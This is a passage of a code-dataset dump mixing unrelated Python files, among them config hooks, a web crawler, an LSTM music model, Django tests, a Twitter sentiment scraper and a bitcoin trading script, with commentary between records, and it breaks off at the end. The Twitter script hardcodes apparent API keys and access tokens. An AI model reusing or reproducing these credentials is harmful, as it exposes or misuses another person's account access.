validate_item_hook=None,\n post_update_hook=post_update_hook(inst))\n\n\n@bindable\ndef monitor_environ(inst: _Config, environ: Dict[str, str]) -> MonitoredEnviron:\n # called when setting the environ config field, rather than updating\n # individual variables\n if not all(isinstance(i, str) for i in sum(environ.items(), ())):\n raise TypeError(\"All keys and values in environ mapping must be 'str'\")\n if isinstance(inst, GlobalConfig):\n post_update_hook = environ_post_update_global\n else:\n post_update_hook = environ_post_update_project\n return MonitoredEnviron(initial_env=dict(),\n custom_vars=environ,\n validate_item_hook=None,\n post_update_hook=post_update_hook(inst))\n\n\n@bindable\ndef monitor_email(\n inst: _Config,\n new_emails: OneOrMore[str]\n) -> MonitoredList[EmailAddress]:\n if isinstance(new_emails, str):\n new_emails = [new_emails]\n else:\n new_emails = list(new_emails)\n for eml in new_emails:\n validate_email(eml)\n if isinstance(inst, GlobalConfig):\n post_update_hook = email_post_update_global\n else:\n post_update_hook = email_post_update_project\n return MonitoredList(new_emails,\n validate_item_hook=validate_email,\n post_update_hook=post_update_hook(inst))\n\n\nBASE_CONFIG_UPDATE_HOOKS = {\n 'job_basename': validate_job_basename,\n 'wall_time': validate_walltime_str,\n 'modules': monitor_modules,\n 'environ': monitor_environ,\n 'email': monitor_email\n}\n\n\n########################################################################\n# GLOBAL CONFIG HOOKS #\n########################################################################\n@bindable\ndef move_projects(inst: GlobalConfig, new_dir: str) -> str:\n # TODO: write me... this is a tricky one. will need to\n # inst._cluster.check_output() a 'mv' command for each project in\n # the old project_dir. 
Also should confirm\n # inst._cluster.is_dir(PurePosixPath(new_dir)) first\n # enforce_value_type(value=new_dir, _type=str)\n raise NotImplementedError(\"Moving project directory is not yet supported\")\n\n\n# @bindable\n# def launch_in_project_dir_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef validate_shell_executable(inst: GlobalConfig, new_exe: str) -> str:\n # update cluster object, which conveniently validates executable\n # enforce_value_type(value=new_exe, _type=str)\n inst._cluster.executable = new_exe\n return new_exe\n\n\n# @bindable\n# def confirm_project_deletion_hook(inst: GlobalConfig, pref: bool) -> None:\n# enforce_value_type(value=pref, _type=bool)\n\n\n@bindable\ndef check_default_prefer_value(\n inst: GlobalConfig,\n pref: Literal['local', 'remote', 'recent']\n) -> None:\n if pref not in ('local', 'remote', 'recent'):\n raise ValueError(\n \"default file syncing behavior must be either 'local', 'remote', \"\n \"or 'recent'\"\n )\n\n\nGLOBAL_CONFIG_UPDATE_HOOKS = {\n 'project_dir': move_projects,\n 'executable': validate_shell_executable,\n 'default_prefer': check_default_prefer_value,\n}\n\n\n########################################################################\n# PROJECT CONFIG HOOKS #\n########################################################################\n@bindable\ndef update_config_from_global(inst: ProjectConfig, pref: bool) -> bool:\n # TODO: write me. This one's going to take some pre-planning &\n # coordinating between ProjectConfig, Project, MonitoredEnviron,\n # TrackedAttrConfig, etc. classes\n ...\n return pref\n\n\n@bindable\ndef init_project_job_monitor(inst: ProjectConfig, pref: bool) -> bool:\n # initializes a monitor Job object on the associated Project object\n # when auto_monitor_jobs is set to True, removes it when set to False\n if pref and not inst._config.monitoring.auto_monitor_jobs:\n inst._project._init_monitor()\n elif not pref:\n inst._project._monitor_script = inst._project._monitor = None\n return pref\n\n\nPROJECT_CONFIG_UPDATE_HOOKS = {\n 'auto_monitor_jobs': init_project_job_monitor\n}\n","sub_path":"clustertools/file_objects/configs/config_helpers.py","file_name":"config_helpers.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
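The `bindable` decorator in config_helpers.py works because plain functions are descriptors: `func.__get__(instance)` is the same machinery Python uses to turn a function found on a class into a bound method. A self-contained toy demonstration (names invented for illustration):

```python
from functools import wraps

def bindable(func):
    # Calling the wrapper with an instance returns func bound to it,
    # exactly as if func had been looked up as a method on that instance.
    @wraps(func)
    def bind(instance):
        return func.__get__(instance)
    return bind

@bindable
def describe(self, value):
    # 'self' is supplied by the binding step, not at call time.
    return f"{self.name}: {value}"

class Config:
    name = "demo"

bound = describe(Config())  # bind the hook to an instance at runtime
print(bound("hello"))       # -> demo: hello
```

This is why the monitor hooks above call `post_update_hook(inst)` first: that call performs the binding, and the returned bound hook is presumably what MonitoredList/MonitoredEnviron later invoke without any instance argument.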
+{"seq_id":"315055910","text":"def f(lst, arr, dex):\n    # Base case: lst now holds one complete permutation of the digits.\n    if dex == 1:\n        num = int(\"\".join(lst))\n        # num is a power of two iff repeated halving reaches exactly 1.\n        while num != 1:\n            if num % 2 == 1:\n                return\n            num //= 2\n        return True\n    else:\n        # Permute by swapping each element into slot dex-1, recursing,\n        # then swapping back to restore the original order.\n        for i in range(0, dex):\n            lst[dex - 1], lst[i] = lst[i], lst[dex - 1]\n            if f(lst, arr, dex - 1):\n                return True\n            lst[dex - 1], lst[i] = lst[i], lst[dex - 1]\n\n\nnum = input()\nlst = list(num)\narr = []\nnum = int(num)\nif num == 1:\n    print('true')\nelse:\n    if f(lst, arr, len(lst)):\n        print('true')\n    else:\n        print('false')\n","sub_path":"Code/CodeRecords/2529/60644/245964.py","file_name":"245964.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
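The recursion in the record above is a hand-rolled permutation generator (swap element i into the last open slot, recurse on the prefix, swap back) wrapped around a power-of-two test by repeated halving. An equivalent, easier-to-verify version of the same idea using the standard library (my naming, not from the record):

```python
from itertools import permutations

def reordered_power_of_2(n: int) -> bool:
    for perm in permutations(str(n)):
        if perm[0] == '0':  # a reordering may not introduce a leading zero
            continue
        m = int(''.join(perm))
        # m is a power of two iff repeated halving reaches exactly 1
        while m % 2 == 0:
            m //= 2
        if m == 1:
            return True
    return False

print(reordered_power_of_2(46))  # True: '64' is a reordering, and 2**6 == 64
print(reordered_power_of_2(10))  # False: neither 10 nor 01 qualifies
```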
+{"seq_id":"638388914","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\n\npages = set()\nrandom.seed(datetime.datetime.now())\n\ndef get_internal_links(bs_object, include_url):\n    internal_links = []\n    for link in bs_object.findAll(\"a\", href=re.compile(\"^(/|.*\" + include_url + \")\")):\n        if link.attrs['href'] is not None:\n            if link.attrs['href'] not in internal_links:\n                internal_links.append(link.attrs['href'])\n\n    return internal_links\n\ndef get_external_links(bs_object, exclude_url):\n    external_links = []\n    for link in bs_object.findAll(\"a\", href=re.compile(\"^(http|www)((?!\" + exclude_url + \").)*$\")):\n        if link.attrs['href'] is not None:\n            if link.attrs['href'] not in external_links:\n                external_links.append(link.attrs['href'])\n\n    return external_links\n\ndef split_address(address):\n    address_parts = address.replace(\"http://\", \"\").split(\"/\")\n    return address_parts\n\ndef get_random_external_link(starting_page):\n    html = urlopen(starting_page)\n    bs_object = BeautifulSoup(html, \"html.parser\")\n    external_links = get_external_links(bs_object, split_address(starting_page)[0])\n    if len(external_links) == 0:\n        # no external links on this page: follow a random internal link\n        # and keep looking from there.\n        internal_links = get_internal_links(bs_object, split_address(starting_page)[0])\n        return get_random_external_link(internal_links[random.randint(0, len(internal_links) - 1)])\n    else:\n        return external_links[random.randint(0, len(external_links) - 1)]\n\ndef follow_external_only(starting_site):\n    external_link = get_random_external_link(starting_site)\n    print(\"Random external link is: \" + external_link)\n    follow_external_only(external_link)\n\n#follow_external_only(\"http://www.oreilly.com\")\n\nall_external_links = set()\nall_internal_links = set()\n\ndef get_all_external_links(site_url):\n    html = urlopen(site_url)\n    bs_object = BeautifulSoup(html, \"html.parser\")\n    internal_links = get_internal_links(bs_object, split_address(domain)[0])\n    external_links = get_external_links(bs_object, split_address(domain)[0])\n\n    for link in external_links:\n        if link not in all_external_links:\n            all_external_links.add(link)\n            print(link)\n\n    for link in internal_links:\n        # normalize relative links to absolute URLs before recursing\n        if link == \"/\":\n            link = domain\n        elif link[0:2] == \"//\":\n            link = \"http:\" + link\n        elif link[0:1] == \"/\":\n            link = domain + link\n        if link not in all_internal_links:\n            all_internal_links.add(link)\n            get_all_external_links(link)\n\ndomain = \"http://en.wikipedia.org/wiki/Kevin_Bacon\"#\"http://www.oreilly.com\"\nget_all_external_links(domain) \n","sub_path":"crawler/Chap3/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
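The two `href` patterns above partition anchors: a link counts as internal when it starts with `/` or contains the site's own domain, and external when it starts with `http`/`www` and never mentions that domain (the `(?!...)` negative lookahead). A quick standalone check with illustrative URLs:

```python
import re

include_url = "oreilly.com"  # what split_address(...)[0] would return
internal = re.compile("^(/|.*" + include_url + ")")
external = re.compile("^(http|www)((?!" + include_url + ").)*$")

for href in ["/about", "http://www.oreilly.com/ideas",
             "http://example.org", "www.python.org"]:
    if internal.match(href):
        kind = "internal"
    elif external.match(href):
        kind = "external"
    else:
        kind = "other"
    print(href, "->", kind)
# /about -> internal
# http://www.oreilly.com/ideas -> internal
# http://example.org -> external
# www.python.org -> external
```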
+{"seq_id":"264598004","text":"from tensorflow.compat.v1 import keras\nfrom tensorflow.compat.v1.keras import layers\n\nBASIC_DEFAULT_MIN_NOTE = 48\nBASIC_DEFAULT_MAX_NOTE = 84\n# dimensionality of one event\nBASIC_EVENT_DIM = BASIC_DEFAULT_MAX_NOTE - BASIC_DEFAULT_MIN_NOTE + 2 # all note on events, note off, rest\nLOOKBACK_RNN_INPUT_EVENT_DIM = 120\n\n\ndef get_simple_rnn_model(event_dim, is_Training, temperature=1):\n    # input_shape: (None, : different sequence lengths (per batch; every sequence in one batch does have the same dimension)\n    # EVENT_DIM) : dimensionality of one event\n    layer_one_args = {'units': 128,\n                      'input_shape': (None, event_dim),\n                      'return_sequences': True,\n                      'dropout': 0.5,\n                      'recurrent_dropout': 0.5,\n                      }\n    layer_two_args = {'units': 128,\n                      'return_sequences': True,\n                      'dropout': 0.5,\n                      'recurrent_dropout': 0.5,\n                      }\n    # for generating\n    if not is_Training:\n        # we predict one by one event\n        layer_one_args['input_shape'] = (1, event_dim)\n        layer_one_args['batch_input_shape'] = (1, 1, event_dim)\n        layer_one_args['stateful'] = True\n        layer_two_args['stateful'] = True\n\n    model = keras.Sequential()\n    model.add(layers.LSTM(**layer_one_args))\n    # second LSTM layer\n    model.add(layers.LSTM(**layer_two_args))\n    # temperature must scale the logits (the pre-softmax Dense output);\n    # scaling the LSTM activations instead would simply be absorbed by\n    # the Dense weights and leave the sampling distribution unchanged\n    model.add(layers.Dense(units=event_dim))\n    model.add(layers.Lambda(lambda x: x / temperature))\n    model.add(layers.Activation('softmax'))\n\n    return model\n","sub_path":"magenta/models/my_rnn/my_simple_rnn_model.py","file_name":"my_simple_rnn_model.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
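Because the generation-time model is built with `batch_input_shape=(1, 1, event_dim)` and `stateful=True`, events are fed one at a time and the LSTM state carries over between calls. A hedged sketch of the sampling loop this setup implies; `get_simple_rnn_model` and `BASIC_EVENT_DIM` come from the file above, while the loop itself and the weights path are assumptions:

```python
import numpy as np

model = get_simple_rnn_model(BASIC_EVENT_DIM, is_Training=False, temperature=1.2)
# model.load_weights("rnn_weights.h5")  # hypothetical checkpoint from training

event = np.zeros((1, 1, BASIC_EVENT_DIM), dtype=np.float32)
event[0, 0, 0] = 1.0  # seed with an arbitrary one-hot event

generated = []
for _ in range(32):
    # predict returns shape (1, 1, event_dim) since return_sequences=True
    probs = model.predict(event, batch_size=1)[0, 0].astype(np.float64)
    idx = int(np.random.choice(BASIC_EVENT_DIM, p=probs / probs.sum()))
    generated.append(idx)
    event = np.zeros((1, 1, BASIC_EVENT_DIM), dtype=np.float32)
    event[0, 0, idx] = 1.0

model.reset_states()  # drop the carried LSTM state before the next sequence
```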
+{"seq_id":"540065786","text":"from matplotlib import pyplot as plt \nimport json\nimport os\nimport operator\n\nfilterMethod = \"kalman\"\n\ndata_dir = os.getcwd() + \"/beacon-all-points-\" + filterMethod + \"/\"\nf = open(os.path.join(data_dir, \"beacon.json\"),\"r\")\ndata = json.load(f)\nf.close()\n\nsave_path = os.getcwd() + \"/Graphs/rssi_vs_distance_reported/\"\nif not(os.path.isdir(save_path)) : \n\tos.mkdir(save_path)\n\ndistance = {}\nrssi = {}\nnoOfBeacons = 10\n\nfor elem in data[\"beacon\"]:\n\tfor values in elem[\"beaconData\"]:\n\t\tif values[\"id3\"] in distance :\n\t\t\tdistance[values[\"id3\"]].append(values[\"distance\"])\n\t\telse :\n\t\t\tdistance[values[\"id3\"]] = [values[\"distance\"]]\n\n\t\tif values[\"id3\"] in rssi :\n\t\t\trssi[values[\"id3\"]].append(values[\"rssi\"])\n\t\telse :\n\t\t\trssi[values[\"id3\"]] = [values[\"rssi\"]]\n\t\t\nfor beaconNo in range(1, noOfBeacons+1) :\n\tplt.figure(figsize=(16, 10))\n\tplt.title(\"Variation in RSSI vs reported distance from beacon \" + str(beaconNo)) \n\tplt.xlabel(\"Distance in meters\") \n\tplt.ylabel(\"RSSI in dBm\") \n\tsort_axis = operator.itemgetter(0)\n\tsorted_zip = sorted(zip(distance[beaconNo], rssi[beaconNo]), key=sort_axis)\n\tsort_distance, sort_rssi = zip(*sorted_zip)\n\tplt.plot(sort_distance, sort_rssi, \"-ob\") \n\tplt.grid()\n\t# plt.show()\n\tfilename = os.path.join(save_path, \"rssi_vs_distance_\" + str(beaconNo))\n\tplt.savefig(filename, dpi=200, bbox_inches='tight')\n\tplt.close()","sub_path":"BTP/CC Lab/WKNN/rssi_vs_distance_graph.py","file_name":"rssi_vs_distance_graph.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
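The sort in the plotting loop above uses the zip/sort/unzip idiom so the distance and RSSI samples stay paired while the x-axis becomes monotonic; the same idiom in isolation:

```python
import operator

distance = [3.2, 1.1, 2.7]
rssi = [-70, -55, -64]

# sort the pairs by distance, then split back into two aligned tuples
pairs = sorted(zip(distance, rssi), key=operator.itemgetter(0))
sort_distance, sort_rssi = zip(*pairs)
print(sort_distance)  # (1.1, 2.7, 3.2)
print(sort_rssi)      # (-55, -64, -70)
```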
+{"seq_id":"510989694","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.test import TestCase\nfrom cooking.models.Recipe import Recipe\nfrom cooking.tests import util\n\n__author__ = 'sarace'\n\n\nclass RecipeMethodsTests(TestCase):\n\n def test_create_recipe(self):\n \"\"\"\n Test the creation of a recipe\n :return:\n \"\"\"\n util.create_test_recipe()\n new_recipe = Recipe.objects.get(name='Tarte Tatin')\n self.assertTrue(new_recipe.id is not None)\n self.assertTrue(new_recipe.global_time == 55)\n self.assertTrue(new_recipe.preparation_time == 15)\n self.assertTrue(new_recipe.costs == 1)\n self.assertTrue(new_recipe.user_mod == 'user_test')\n self.assertTrue(new_recipe.num_people == 6)\n\n def test_update_recipe(self):\n \"\"\"\n Update a recipe, save it and test if the changes were done.\n :return:\n \"\"\"\n recipe = util.create_test_recipe()\n old_recipe_id = recipe.id\n old_recipe_global_time = recipe.global_time\n recipe.global_time = 60\n recipe.save()\n new_recipe = Recipe.objects.get(name='Tarte Tatin')\n self.assertTrue(old_recipe_id == new_recipe.id)\n self.assertFalse(old_recipe_global_time == new_recipe.global_time)\n\n\n def test_delete_recipe(self):\n with self.assertRaises(ObjectDoesNotExist):\n \"\"\"\n Delete a recipe and check if it is not anymore in the DB\n :return:\n \"\"\"\n recipe = util.create_test_recipe()\n recipe_id = recipe.id\n recipe.delete()\n deleted_recipe = Recipe.objects.get(pk=recipe_id)\n","sub_path":"cooking/tests/RecipeTests.py","file_name":"RecipeTests.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"386609711","text":"try:\n\timport time, csv, sys, io, re\n\timport twitter\n\tfrom textblob import TextBlob\nexcept ImportError:\n\tprint(\"ERROR MESSAGE:\")\n\tprint(\"You should have twitter-python api installed.\")\n\tprint(\"You should have textblob api installed.\")\n\tprint(\"You should have csv api installed.\")\n\tprint(\"You should have io api installed.\")\n\tprint(\"You should have re api installed.\")\n\tprint(\"You should have time api installed.\")\n\ndef clean_tweet(string):\n\t# Turns out that Text blob handles emoticons for sentiment analysis as well.\n\t# So there is no need to replace emoticons.\n\t#cleaning tweets for some well known abbreviations and removing special characters.\n\t#removing hyperlinks as well as Twitter is attaching the Tweet link after the Tweet text.\n\tstring = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', string)\n\tstring = re.sub(r'\\bthats\\b', 'that is', string)\n\tstring = re.sub(r'\\bive\\b', 'i have', string)\n\tstring = re.sub(r'\\bim\\b', 'i am', string)\n\tstring = re.sub(r'\\bya\\b', 'yeah', string)\n\tstring = re.sub(r'\\bcant\\b', 'can not', string)\n\tstring = re.sub(r'\\bwont\\b', 'will not', string)\n\tstring = re.sub(r'\\bid\\b', 'i would', string)\n\tstring = re.sub(r'wtf', 'what the fuck', string)\n\tstring = re.sub(r'\\bwth\\b', 'what the hell', string)\n\tstring = re.sub(r'\\br\\b', 'are', string)\n\tstring = re.sub(r'\\bu\\b', 'you', string)\n\tstring = re.sub(r'\\bk\\b', 'OK', string)\n\tstring = re.sub(r'\\bsux\\b', 'sucks', string)\n\tstring = re.sub(r'\\bno+\\b', 'no', string)\n\tstring = re.sub(r'\\bcoo+\\b', 'cool', string)\n\t#no need to remove emoticons\n\t#string = re.sub(r'\\b:\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b:D\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\(\\b', 'sad', string)\n\t#string = re.sub(r'\\b:-\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b=\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b\\(:\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\\\\\b', 'annoyed', string)\n\treturn string\n\n#Python has some serious problems with non ascii characters.\ndef strip_non_ascii(string):\n\t#removing the non ascii characters from the string because Python has a lot of encoding problems\n\t''' Returns the string without non ASCII characters'''\n\tstripped = (c for c in string if 0 < ord(c) < 127)\n\treturn ''.join(stripped)\n\n#To get the runtime of the program, can be ignored.\nstart_time = time.time()\n#Access keys for the Twitter API\nconsumer_key = 'DGh9KwPCvFwmOGHoBajHaCEIP'\nconsumer_secret = 'h5nGxUW36rKDYyXJF2bJRHafLOmPwOO6hPqWAraDNMh3j0DUWc'\naccess_token = '963536281165803520-NQzBRAIa13bjmIYd2cEmgDKqgvFY3JP'\naccess_secret = 'lp2Hu3FOdJ5Z563Isb7VCUtTk2UwH03LLummrYskunnd3'\n\n#40.7127° N, -74.0134° W One World Trade Center\n#37.8199° N, -122.4783° W Golden Gate Bridge\n#Getting the Latitude and Longitude from Google Places API\noutfile = \"tweets.csv\"\nlatitude = 37.8199\nlongitude = -122.4783\nkm_range = 1000\nnum_results = 100\n\n#auth = OAuthHandler(consumer_key, consumer_secret)\n#auth.set_access_token(access_token, access_secret)\n\n#twitter = Twitter(\n#\tauth = OAuth(access_token, access_secret, consumer_key, consumer_secret)) \n#Authentication for the Twitter API\ntry:\n\tapi = twitter.Api(consumer_key, consumer_secret, access_token, access_secret)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Authentication Failed. Do something!!!!\")\n\n#Indexing and opening the CSV file to store the tweets in\n#Stream API can also work.\ntry:\n\tindexer = [\"User\", \"Tweet\", \"Latitude\", \"Longitude\", \"Sentiment\", \"ID\"]\n\tcsvfile = open(outfile,\"w\")\n\tcsvwriter = csv.writer(csvfile)\n\tcsvwriter.writerow(indexer)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"cannot open the csv file to save the tweets.\")\n\n#Main Program starts here,\n#api = tweepy.API(auth)\n#for status in tweepy.Cursor(api.home_timeline).items(100):\n # with io.open(\"lol.txt\", \"w+\", encoding = 'utf-8') as f:\n # \tf.write(status.text)\n#f.close()\ntry:\n\tglobal last_id\n\tresult_count= 0\n\tlast_id = None\n\tquery = api.GetSearch(geocode = (latitude, longitude, \"100mi\"), count=512, max_id = last_id)\n\tprint(len(query))\nexcept: \n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Not able to query the twitter API. \")\n\tprint(\"Check Connection.\")\n#total count is the number of tweets we have\n#needed_tweets is the number of tweets we need\n#we call the api until we get the amount of tweets that we need.\ntotal_count = 1\nneeded_tweets = 1000\nwhile(total_count < needed_tweets):\n\tquery = api.GetSearch(geocode = (latitude, longitude, \"100mi\"), count=512, max_id = last_id)\n\tfor result in query:\n\t\ttotal_count += 1\n\t\tuser = result.user.screen_name\n\t\tans = strip_non_ascii(clean_tweet(result.text.lower()))\n\t\t#TextBlob polarity is a float in [-1, 1]\n\t\tsetup = TextBlob(ans).sentiment.polarity\n\t\tif setup >= 0.1:\n\t\t\tpolarity = 'positive'\n\t\telif setup <= -0.1:\n\t\t\tpolarity = 'negative'\n\t\telse:\n\t\t\tpolarity = 'neutral'\n\t\t#print(polarity)\n\t\t#last_id gets the last ID of the tweet that was found in the last iteration\n\t\tif(not(last_id)):\n\t\t\tlast_id = result.id\n\t\telse:\n\t\t\tlast_id = min(result.id, last_id)\n\t\t#we use last ID so that we do not get past tweets again and again\n\t\tID = result.id\n\t\t#print(str(last_id) + \"\\t\" + str(ID))\n\t\trow = [user, ans, latitude, longitude, polarity, ID]\n\t\tcsvwriter.writerow(row)\n\t\t#Still getting same tweets again and again.\n\t\t#Twitter API is not giving access to old tweets I suppose. Maybe the result of a Standard Licence API?\n\t\t#print(result.full_text)\n\t\t#if(result[\"geo\"]):\n\t\t#\tuser = result[\"user\"][\"screen_name\"]\n\t\t#\ttext = result[\"text\"]\n\t\t#\tt=text\n\t\t#\ttext = str(t)\n\t\t#\tlatituded = result[\"geo\"][\"coordinates\"][0]\n\t\t#\tlongituded = result[\"geo\"][\"coordinates\"][1]\n\t\t#\t#-----------------------------------------------------------------------\n\t\t#\t# now write this row to our CSV file\n\t\t\t#-----------------------------------------------------------------------\n\t\t#\trow = [ user, text, latituded, longituded ]\n\t\t#\tcsvwriter.writerow(row)\n\t\t#\tresult_count += 1\n\t\t#\tlast_id = result[\"id\"]\n\t\t#print(\"%d tweets received as of now\"%(count))\n\t#total_count+=count\n\t#print(\"%d is the total amount of tweets received.\"%(total_count))\ncsvfile.close()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n#[6918 rows x 3 columns]\n#Accuracy 0.837236195432\n#Precision 0.894869638352","sub_path":"other/Tweet_Sentiment.py","file_name":"Tweet_Sentiment.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
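The thresholding above buckets TextBlob's polarity, a float in [-1, 1], into three labels. The same pipeline in isolation, reusing the record's `clean_tweet` and `strip_non_ascii`; the printed labels are expected outcomes, since the exact polarity depends on TextBlob's lexicon:

```python
from textblob import TextBlob

def label_sentiment(text, pos=0.1, neg=-0.1):
    # Same cleaning and cutoffs as the record: >= 0.1 positive, <= -0.1 negative.
    cleaned = strip_non_ascii(clean_tweet(text.lower()))
    p = TextBlob(cleaned).sentiment.polarity
    if p >= pos:
        return 'positive'
    elif p <= neg:
        return 'negative'
    return 'neutral'

print(label_sentiment("the golden gate bridge is beautiful today"))  # positive (expected)
print(label_sentiment("the traffic was terrible"))                   # negative (expected)
```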
+{"seq_id":"134819001","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nimport sys\n\nsys.path.insert(0, \"../../../Data/src/ReadData\")\nimport RRL as RRL\nimport regDataSets as data\nimport dataProcessing as proc\n\n\n# parameters\ndataPath = \"../../../Data/\"\nfileName = dataPath + \"bcEUR.csv.gz\"\n\nstartTimes = [9.46771200e+08, 1.4005e9]\nendTimes = [1.4e9, 1.431e9]\n\nsmoothWindow = 30\ntimeScale = 3\n\nNtrain = 1\nNderivs = 2 \t\t\t# consider past point in decision\ntimePerBin = 500 \t# number of seconds per bin\ntrainSteps = 500\nNtimeBins_train = 20\nNtimeBins_test = 20\nlearningRate = .7\nLRdecay = 0.8\nreg = 0.0\n\nfee = 0.0025\n\n\n####\tImport Data ####\ndataSets = data.importData(fileName, startTimes, endTimes)\n\n# Rebin the data\nprint(len(dataSets))\ntime_train, price_train = proc.binner(dataSets[0], timePerBin, NtimeBins_train)\ntime_test, price_test = proc.binner(dataSets[1], timePerBin, NtimeBins_test)\n\n# Final price array to be used\nX_train = proc.smoother(time_train, price_train, smoothWindow, timeScale)\nX_test = proc.smoother(time_test, price_test, smoothWindow, timeScale)\n\n# Indicator (+-1) of the price from n-1 to n at index n\nY_train = data.getYvalues(X_train)\nY_test = data.getYvalues(X_test)\n\n# BTC price change rate between NN bins\nbtcRate_train = np.zeros(NtimeBins_train - 1 - Nderivs)\nbtcRate_test = np.zeros(NtimeBins_test - 1 - Nderivs)\n \nfor itm in range(Nderivs+1, NtimeBins_test):\n btcRate_test[itm-1-Nderivs] = X_test[itm]/X_test[itm-1] - 1.0\n\nfor itm in range(Nderivs+1, NtimeBins_train):\n btcRate_train[itm-1-Nderivs] = X_train[itm]/X_train[itm-1] - 1.0\n\n\n#### Make Features ####\n\n# Calculate derivatives\nderivs_train = RRL.derivatives(X_train, Nderivs)\nderivs_test = RRL.derivatives(X_test, Nderivs)\n\nfeatures_train = derivs_train\nfeatures_test = derivs_test\n\n#### Resize ####\ntime_train = time_train[Nderivs+1:-1]\nprice_train = price_train[Nderivs+1:-1]\ntime_test = time_test[Nderivs+1:-1]\nprice_test = price_test[Nderivs+1:-1]\n\nX_train = X_train[Nderivs+1:-1]\nX_test = X_test[Nderivs+1:-1]\nY_train = Y_train[Nderivs+1:-1]\nY_test = Y_test[Nderivs+1:-1]\n\nfeatures_train = features_train[:-1]\nfeatures_test = features_test[:-1]\n\n\n###########################\n#### Train The Model ####\n###########################\n\ntheta = np.zeros(np.size(features_train,1))\nwealth_train = np.zeros(np.size(features_train,0))\n\n#### Training ####\nfor itm in range(1, Ntrain+1):\n theta = RRL.RRLearning(features_train, theta, learningRate, btcRate_train, fee)\n learningRate = learningRate*LRdecay\n\n#### Calculate Profit ####\ncorrectRate = 0;\nbuyThresh = 0\nsellThresh = 0\nprofit_train = np.zeros(np.size(features_train, 0))\nprofit_train[0] = 1.\nFarr_train = np.zeros(np.size(features_train, 0))\nfor itm in range(0,np.size(features_train, 0)):\n Farr_train[itm] = (1.0 + np.tanh(np.dot(theta, features_train[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_train, 0)):\n correctRate += (np.sign(Y_train[itm]*(Farr_train[itm] - 0.5)) + 1.0)/2.0\n profit_train[itm] = profit_train[itm-1]*(1.0 + Farr_train[itm]*btcRate_train[itm])*(1.0 - fee*np.abs(Farr_train[itm] - Farr_train[itm-1]))\n\nprint(\"!!!!! 
TRAINING RESULTS !!!!!\")\nprint(\" log profit of \" + str(profit_train[np.size(features_train, 0)-1]))\n\ncorrectRate = (correctRate/np.size(features_train, 0))\nprint(\" correct rate: \" + str(correctRate))\n\n\n##########################\n#### Test The Model ####\n##########################\n\ncorrectRate = 0\nprofit_test = np.zeros(np.size(features_test, 0))\nprofit_test[0] = 1.0\n\nFarr_test = np.zeros(np.size(features_test,0))\nfor itm in range(0,np.size(features_test,0)):\n Farr_test[itm] = (1.0 + np.tanh(np.dot(theta, features_test[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_test,0)):\n correctRate += (np.sign(Y_test[itm]*(Farr_test[itm] - 0.5)) + 1.0)/2.0\n profit_test[itm] = profit_test[itm-1]*(1.0 + Farr_test[itm]*btcRate_test[itm])*(1.0 - fee*np.abs(Farr_test[itm] - Farr_test[itm-1]))\n\ncorrectRate = (correctRate/np.size(features_test, 0))\n\nprint(\"!!!!! TESTING RESULTS !!!!!\")\nprint(\" log test profit of \" + str(profit_test[np.size(features_test, 0) - 1]))\nprint(\" correct rate: \" + str(correctRate))\n\nprint(\"\\n\\nFinal test/train cumulative weighted confidence\\n\"\n +\"\\t\"+str(profit_test[-1])+\" / \"+str(profit_train[-2])+\" \"\n +str(np.log10(profit_test[-1]))+\" / \"+str(np.log10(profit_train[-2])));\n\n\n########################\n#### Plot Results ####\n########################\n\nfig, ax = plt.subplots(figsize=(7,5))\n\ntime_train /= 86400\ntime_test /= 86400\n\nprint(time_train.shape, profit_train.shape)\ntplt1, = ax.plot(time_train, profit_train, 'b', label='Train', linewidth=2.5)\ntplt2, = ax.plot(time_test, profit_test, 'k', label='Test', linewidth=2.5)\nax.set_xlabel('Time [days]', fontweight='bold')\nax.set_ylabel('Cumulative Weighted Confidence', fontweight='bold')\nax.semilogy()\n\nlgnd = ax.legend(handles=[tplt1, tplt2], title='Recurrent RL', loc='lower right', fancybox=True)\nplt.setp(lgnd.get_title(), fontsize='large', fontweight='bold')\nax.grid()\nplt.show()\nfig.savefig(\"rrlTestvTrain.png\", format='png')\n\n","sub_path":"Learning/src/RRL/run_RRL.py","file_name":"run_RRL.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
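Both evaluation loops in run_RRL.py apply the same one-step update: the position F_t in [0, 1] comes from (1 + tanh(theta · x_t)) / 2, r_t is the per-bin BTC return, and a fee proportional to the position change is charged. One step worked through with made-up numbers:

```python
import math

fee = 0.0025
wealth = 1.0
F_prev = 0.40   # previous position weight in [0, 1]
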